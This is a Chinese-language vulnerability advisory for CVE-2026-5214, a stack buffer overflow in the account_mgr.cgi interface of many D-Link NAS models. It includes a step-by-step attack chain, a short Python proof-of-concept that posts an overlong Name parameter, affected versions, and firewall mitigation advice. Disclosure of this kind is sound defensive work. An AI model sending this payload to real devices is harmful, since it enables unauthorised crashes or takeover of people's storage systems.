CVE-2026-5214 CVSS 8.8 高危

CVE-2026-5214 D-Link多款设备栈溢出漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5214

漏洞类型

栈溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04

漏洞概述

D-Link多款网络存储设备在/cgi-bin/account_mgr.cgi接口存在栈溢出漏洞，攻击者可通过构造恶意Name参数导致远程代码执行。

技术细节

该漏洞位于D-Link设备的account_mgr.cgi脚本中的cgi_addgroup_get_group_quota_minsize函数。由于未对用户传入的'Name'参数进行严格的长度校验，直接将其拷贝到栈上的缓冲区中，导致基于堆栈的缓冲区溢出。攻击者可利用此漏洞覆盖返回地址，从而在目标系统上执行任意代码，获取系统控制权。由于CVSS向量显示PR:L，攻击者通常需要低权限账号才能发起攻击。

攻击链分析

STEP 1

Reconnaissance

扫描目标网络，识别存在漏洞的D-Link设备型号及开放端口。

STEP 2

Authentication

利用低权限账号登录设备（CVSS PR:L）。

STEP 3

Exploitation

向/cgi-bin/account_mgr.cgi发送包含超长Name参数的恶意POST请求。

STEP 4

Execution

触发栈溢出，覆盖返回地址，执行Shellcode获取系统权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

url = "http://target-ip/cgi-bin/account_mgr.cgi"
# Payload to trigger stack overflow in 'Name' parameter
payload = {
    "Name": "A" * 1000,
    "action": "cgi_addgroup_get_group_quota_minsize"
}

try:
    r = requests.post(url, data=payload)
    print("Exploit sent, status:", r.status_code)
except Exception as e:
    print(e)

影响范围

D-Link DNS-120 <= 20260205

D-Link DNR-202L <= 20260205

D-Link DNS-315L <= 20260205

D-Link DNS-320 <= 20260205

D-Link DNS-320L <= 20260205

D-Link DNS-320LW <= 20260205

D-Link DNS-321 <= 20260205

D-Link DNR-322L <= 20260205

D-Link DNS-323 <= 20260205

D-Link DNS-325 <= 20260205

D-Link DNS-326 <= 20260205

D-Link DNS-327L <= 20260205

D-Link DNR-326 <= 20260205

D-Link DNS-340L <= 20260205

D-Link DNS-343 <= 20260205

D-Link DNS-345 <= 20260205

D-Link DNS-726-4 <= 20260205

D-Link DNS-1100-4 <= 20260205

D-Link DNS-1200-05 <= 20260205

D-Link DNS-1550-04 <= 20260205

防御指南

临时缓解措施

建议立即通过防火墙策略限制对设备80/443端口的公网访问，或在ACL中禁止对/cgi-bin/account_mgr.cgi路径的访问，直到应用补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5214
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5214
3 Details https://www.cvedetails.com/cve/CVE-2026-5214/
4 VulDB https://vuldb.com/cve/CVE-2026-5214
5 Link https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_169/169.md
6 Link https://vuldb.com/submit/780439
7 Link https://vuldb.com/vuln/354349
8 Link https://vuldb.com/vuln/354349/cti
9 Link https://www.dlink.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表